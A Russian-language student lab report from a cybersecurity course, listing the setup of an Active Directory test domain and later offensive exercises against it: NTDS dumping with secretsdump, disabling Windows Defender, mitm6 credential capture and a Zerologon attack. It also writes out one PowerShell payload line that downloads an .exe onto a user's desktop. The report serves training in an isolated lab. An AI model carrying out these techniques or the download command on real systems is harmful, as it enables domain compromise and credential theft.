Здесь предлагается заскринить основные моменты всех практик, которые были выполнены. Урванцев Данила CYB-2 Занятие 1 Oracle Virtualbox установлен; Oracle Virtualbox extentions установлены; Windows Server 2016 (анлгийская версия) установлен; Windows Server 2016 (русская версия) установлен; Windows 10 установлен; Mikrotik импортирован; На Mikrotik настроен сетевой адаптер локальной сети; На Mikrotik настроен NAT. ![](https://i.imgur.com/HMuYMi9.png) Занятие 2 Статические адреса настроены на двух WinServer; Имена компьютеров Winserver и Win10 настроены (dc1, dc2, pc1); На оба WinServer установлены роли AD, DHCP, DNS; WinServer en сконфигурирован как основной контроллер домена hackeru.local; ![](https://i.imgur.com/8mNdT09.png) WinServer ru сконфигурирован как второстепенный контроллер домена; ![](https://i.imgur.com/yupS8im.png) Win10 внесён в домен. ![](https://i.imgur.com/J5cDBLT.png) ![](https://i.imgur.com/XXYsLHz.png) Занятие 3 Применён скрипт newadusergroups.ps1 (созданы OU, пользователи и группы). По итогу в домене будет такая структура объектов: ![](https://i.imgur.com/Z1ZhOnP.png) ![](https://i.imgur.com/f9qKhyL.png) ![](https://i.imgur.com/8ivRr7J.png) ![](https://i.imgur.com/vvAs3Hj.png) ![](https://i.imgur.com/x878EQB.png) Занятие 4 DHCP сервер сконфигурирован на одном из контроллеров домена; ![](https://i.imgur.com/8Ia8h42.png) Создана групповая политики расширенного логирования Политика применена на контроллеры домена. ![](https://i.imgur.com/eXGhGDU.png) Занятие 5 Создана сетевая папка на одном из контроллеров домена; К сетевой папке примены настройки аудита удаления файлов; От имени любого пользователя, работающего на Win10, проведено удаление вложенных файлов/папок из сетевой папки; В журнале событий найдены события удаления. ![](https://i.imgur.com/4RiFO1X.png) Занятие 6 Проведён бэкап файла NTDS; Бэкап перекинут на Kali linux; Просмотрено содержимое файла с помощью secrestdump; ![](https://i.imgur.com/8vNwQwi.png) Загружен .exe или .msi файл с Kali Linux на рабочий стол одного из пользователей win10; Отключал Windows Defender - иначе обнаруживал попытки Payload: powershell -command "Invoke-WebRequest -Uri 'https://mt.lv/winbox64' -OutFile 'C:\Users\Public\desktop\file.exe'" ![](https://i.imgur.com/s6e2r3Q.png) Удалось подключиться с Kali по RDP на Win10; ![](https://i.imgur.com/kUF9ylO.jpg) С помощью mitm6 перехвачена аутентификация трёх пользователей домена. ![](https://i.imgur.com/mlGBm3F.png) ![](https://i.imgur.com/YiBJ9Rf.png) ![](https://i.imgur.com/d8EbOev.png) Занятие 7 Проведена атака zerologon; ![](https://i.imgur.com/AOxAw56.png) Просмотрено содержимое файла NTDS удалённо; ![](https://i.imgur.com/tbXIPod.png) Найдены события, подтверждающие факт компрометации домена. ![](https://i.imgur.com/QviICZj.png)